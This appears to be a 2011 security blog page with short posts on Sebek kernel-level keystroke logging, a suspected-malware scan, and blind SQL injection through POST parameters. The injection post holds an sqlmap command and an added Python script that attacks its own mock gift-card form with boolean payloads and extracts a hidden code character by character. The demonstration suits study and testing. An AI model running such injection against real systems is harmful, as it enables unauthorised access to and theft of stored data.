Pages

What Programming Language Should I Use to Build a Startup?

Often entrepreneurs ask me 'What technology should I build my startup on?' There is no right or wrong answer to this question. It's a decision every company makes for itself, depending on what it's trying to build and the skills of its cofounders. Nonetheless, there are a few rules that one should adhere to. We discuss them in this blog post.

Incident Response Policy

What happens in your company when a production incident occurs? Usually in a typical startup, you will see engineers running around frantically trying to resolve the problem. However, as soon as the incident is resolved, they forget about it and go back to their usual business. A good incident response policy can help bring order into chaos. We provide a sample template in this blog post.

Why Software Deadlines Never Make Sense

We discuss why software deadlines usually don't make sense.

Analyzing Front-End Performance With Just a Browser

We discuss a number of freely available online tools which can be used to analyze bottlenecks in your website.

Why Smaller Businesses Can't Ignore Security and How They Can Achieve It On a Budget

In this article, we show that security is both important and achievable for smaller companies without breaking the bank.

Monday, January 31, 2011

logging in production systems


I've been investigating some solutions for logging access to production Unix boxes (standard CentOS/RHEL). The main product in the market is PowerBroker, which doesn't come cheap. I came across Sebek, an open source tool developed as part of the Honeynet Project. It's a rather interesting idea: it is implemented as an LKM (Linux kernel module) which hooks into the sys_read() call. In addition to performing the regular read() function, it also sends all the data across the network to a Sebek server.
It seems like a rather transparent change, but I am still worried about hacking with LKMs on production systems.

Here is how the deployment looks:


Does anyone use it?

Friday, January 28, 2011

RegMechanic a virus?

Just scanned a popular program, Registry Mechanic (used to speed up your computer), on virustotal.com, and it seems to report it as PUA.Packed.Armadillo-2.

The reviews on CNET look good, so RegMechanic appears to be legit software. It could be that a packer is used to optimize its size, which triggers a false alarm by ClamAV on virustotal.com. Or ... is everyone mistaken and thinking a malicious program is good?

Thursday, January 27, 2011

Good idea, bad implementation

Tuesday, January 25, 2011

Blind SQL injection with POST params

In a blind SQL injection the application never shows query results or database errors in its responses, so the attacker mangles the request parameters and watches for indirect differences (a changed page, a true/false answer, a time delay) to detect whether injection is possible.
A very useful tool for doing that is sqlmap. However, most tutorials I found focus only on injecting the GET (query string) parameters. For example, the page could be http://www.example.com?id=1 and you are trying to find out whether mangling the id parameter causes an injection.
Most of the time, however, the parameters are going to be hidden in a POST form, and you can't simply point sqlmap at a URL.

Today, though, I found a useful article describing how to use sqlmap with POST form params for SQL injection.
Here it is: http://bit.ly/faUlo

A sample usage is

python sqlmap.py -u "http://www.site.com/giftcard" --method "POST" --data "code=1234&amount=25.00"

The --data option carries the form body, so sqlmap sends it as a POST request and tests each parameter in it (here code and amount) just as it would test query-string parameters.
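As an added example (not code from the original post, and not sqlmap's own code), here is the boolean-based technique sqlmap relies on, written out against a constructed stand-in for the gift-card form above. A throwaway sqlite3-backed handler plays the role of the vulnerable /giftcard page (the table, the card codes and the accepted/rejected messages are all made up for the demo), and the probe functions submit the POST form with true and false payloads in the code parameter, first to detect the injection and then to read an unknown card code out of the database one yes/no question at a time.

```python
"""Boolean-based blind SQL injection through POST form parameters.

Added example (not code from the original post or from sqlmap). A small
gift-card checker built on sqlite3 stands in for the web application at
/giftcard; the probe functions do by hand what sqlmap automates: submit the
form with a true payload and a false payload in one parameter and read the
answer off the page text alone.
"""
import sqlite3
from urllib.parse import parse_qs, urlencode


def make_db():
    """Constructed sample data: the attacker knows card 1234 but not 9f3a."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE giftcards (id INTEGER PRIMARY KEY, code TEXT, amount REAL)")
    db.executemany("INSERT INTO giftcards (code, amount) VALUES (?, ?)",
                   [("1234", 25.00), ("9f3a", 100.00)])
    return db


class GiftcardApp:
    """Models POST /giftcard (hypothetical). The page never shows query results
    or SQL errors, only accepted/rejected: that is what makes the injection blind."""

    def __init__(self, db):
        self.db = db

    def post(self, body: str) -> str:
        form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
        try:
            amount = float(form.get("amount", ""))   # parsed as a number, so not injectable
        except ValueError:
            return "400 Bad request"
        # The bug: the code parameter is concatenated straight into the SQL.
        sql = ("SELECT amount FROM giftcards WHERE code = '" + form.get("code", "")
               + "' AND amount >= " + repr(amount))
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error:
            return "200 Card rejected"              # errors are swallowed too
        return "200 Card accepted" if row else "200 Card rejected"


def submit(app, params: dict) -> str:
    """Send one POST form (the body sqlmap builds from --data)."""
    return app.post(urlencode(params))


def is_injectable(app, params: dict, name: str) -> bool:
    """Basic boolean test: the true payload must leave the page unchanged
    and the false payload must change it."""
    base = submit(app, params)
    same = submit(app, {**params, name: params[name] + "' AND 1=1-- "})
    differ = submit(app, {**params, name: params[name] + "' AND 1=2-- "})
    return base == same and same != differ


def ask(app, params: dict, name: str, condition: str) -> bool:
    """One yes/no question to the database through the injectable parameter."""
    probe = {**params, name: params[name] + "' AND (" + condition + ")-- "}
    return submit(app, probe) == submit(app, params)


def extract_string(app, params: dict, name: str, subquery: str, max_len: int = 32) -> str:
    """Recover the result of a scalar subquery one character at a time with a
    binary search over its code point (7 requests per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(app, params, name, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # past the end: unicode('') is NULL, so every comparison fails
            break
        out += chr(lo)
    return out


def run_demo() -> dict:
    app = GiftcardApp(make_db())
    params = {"code": "1234", "amount": "25.00"}      # the form body from the post
    return {
        "code_injectable": is_injectable(app, params, "code"),
        "amount_injectable": is_injectable(app, params, "amount"),
        "stolen_code": extract_string(app, params, "code",
                                      "SELECT code FROM giftcards WHERE id = 2"),
    }


if __name__ == "__main__":
    print(run_demo())
```

Run it directly to see the result dict. The amount field comes back as not injectable because the handler parses it as a number before building the query, so both payloads change the page; that is the same false-positive check sqlmap applies when a true payload alters the response.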